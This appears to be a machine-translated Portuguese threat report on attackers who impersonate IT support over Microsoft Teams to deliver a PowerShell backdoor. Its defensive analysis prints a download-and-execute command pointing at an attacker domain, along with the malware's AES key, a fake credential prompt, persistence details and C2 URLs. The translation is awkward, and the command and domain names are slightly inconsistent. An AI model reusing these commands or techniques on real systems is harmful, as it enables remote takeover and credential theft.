Em um desenvolvimento preocupante para a segurança corporativa, os cibercriminosos começaram a explorar as equipes da Microsoft-confiadas como uma ferramenta interna de mensagens e colaboração-a fornecer malware baseado em PowerShell e obter acesso remoto não autorizado aos sistemas Windows.
Ao personificar o pessoal de suporte de TI e alavancar a engenharia social, esses atores de ameaças ignoram os filtros e as defesas de email tradicionais, atingindo diretamente a confiança do usuário profunda nas plataformas de colaboração cotidiana.
Desde o seu lançamento em 2017, Equipes da Microsoft tornou -se indispensável para organizações em todo o mundo, lidando com bate -papo, reuniões, compartilhamento de arquivos e muito mais.
Os atores de ameaças agora estão capitalizando a onipresença das equipes, criando novos ou comprometendo os inquilinos de equipes existentes, depois iniciando sessões de voz ou bate -papo sob o disfarce de “suporte de TI”, “help desk” ou nomes personalizados embelezados com emojis de marca de seleção para transmitir legitimidade.
Essas contas normalmente dependem do domínio Onmicrosoft.com da Microsoft e prefixos genéricos, como “Admin” ou “SupportBotit”, sinalizando a criação de conta automatizada ou em massa.
Depois que uma sessão de equipes é aceita – geralmente emoldurada como uma verificação de desempenho ou chamada de manutenção de rotina – o invasor instrui a vítima a instalar ferramentas de acesso remoto como Quickassist ou Anydesk.
Através desses utilitários legítimos, o adversário assume o controle do terminal. Diferentemente das campanhas anteriores vinculadas ao Blackbasta Ransomware, que começou com explosões de e-mails em massa antes de um acompanhamento de equipes, alguns ataques recentes ignoram completamente o email, iniciando diretamente através de equipes. Essas variações sugerem vários grupos de atores ou táticas em evolução.
Depois de estabelecer controle remoto, os invasores executam um Powershell carga útil entregue por meio de um comando como:
powershellpowershell.exe -ExecutionPolicy Bypass -WindowsStyle Hidden -Command "Invoke-RestMethod -Uri https://audiorealteak.com/payload/build.ps1/iex"
Este script de vários estágios fornece roubo de credencial, persistência, reconhecimento do sistema e execução remota de código.
No início do script, os parâmetros de AES codificados exclusivos-$iv = "&9*zS7LY%ZN1thfI" e $key = "123456789012345678901234r0hollah"-Os defensores permitem investigações dinâmicas e vincular-se a scripts anteriores atribuídos ao grupo de criptografia de motivação financeira, também conhecida como Water Gamayun ou Larva-208.
Os relatórios da OSINT vinculam este grupo à exploração de dias zero de CVE-2025-26633 (MSC eviltwin) e famílias de malware sob medida, incluindo SilentPrism e Darkwisp.
Após a execução, o malware aplica a operação única por meio de um mutex global:
powershell$AppId = "62088a7b-ae9f-2333-77a-6e9c921cb48e"
$script:SingleInstanceEvent = New-Object Threading.EventWaitHandle $true, …
Em seguida, ele compila e injeta C# para ligar RtlSetProcessIsCritical De Ntdll.dll, marcando o processo do PowerShell como crítico para que o término desencadeie um travamento do sistema, complicando a resposta a incidentes.
UM SystemInfo A função reúne detalhes do host – IP da Public, hardware UUID, dados do sistema operacional – o formam como JSON, o criptografa com AES e exfiltrantes no endpoint C2 do atacante.
Para roubo de credenciais, o script chama um prompt de credencial do Windows nativo:
powershell$D = $Host.UI.PromptForCredential("Need credentials", …)
Essa integração perfeita com a interface do Windows reduz a suspeita do usuário. Credenciais recuperadas são salvas para info.txt no diretório AppData do usuário.
A persistência é alcançada pela primeira vez tentando registrar uma tarefa programada chamada “Google LLC Updater” para executar a carga útil no logon e depois voltar a uma chave de execução do registro se o registro da tarefa falhar.
Ambos os métodos buscam o script do próximo estágio de um domínio de backup (https://cjhsbam[.]com/payload/runner.ps1), garantindo a resiliência contra tentativas de remoção.
Todas https://audiorealtek[.]com/com as respostas descriptografadas e executadas como empregos em PowerShell.
As empresas que usam o Permiso podem aproveitar detecções internas como P0_M365_Teams_Chat_Created_By_Suspicious_External_User_1 e P0_M365_teams_chat_member_name_suspicious_character_1 para identificar interações de equipes suspeitas.
À medida que os atores de ameaças continuam articulando plataformas de colaboração, as organizações devem reforçar a conscientização da segurança em torno de bate-papos externas e chamadas de voz, aplicar listas estritas de inquilino-arco/bloco e monitorar criações de contas anômalas nas equipes da Microsoft.
A detecção proativa de artefatos criptográficos codificados e proteções de processos incomuns em scripts do PowerShell podem fornecer alerta precoce crucial dessas ameaças em engenharia social em evolução.
Encontre esta história interessante! Siga -nosLinkedIneXPara obter mais atualizações instantâneas.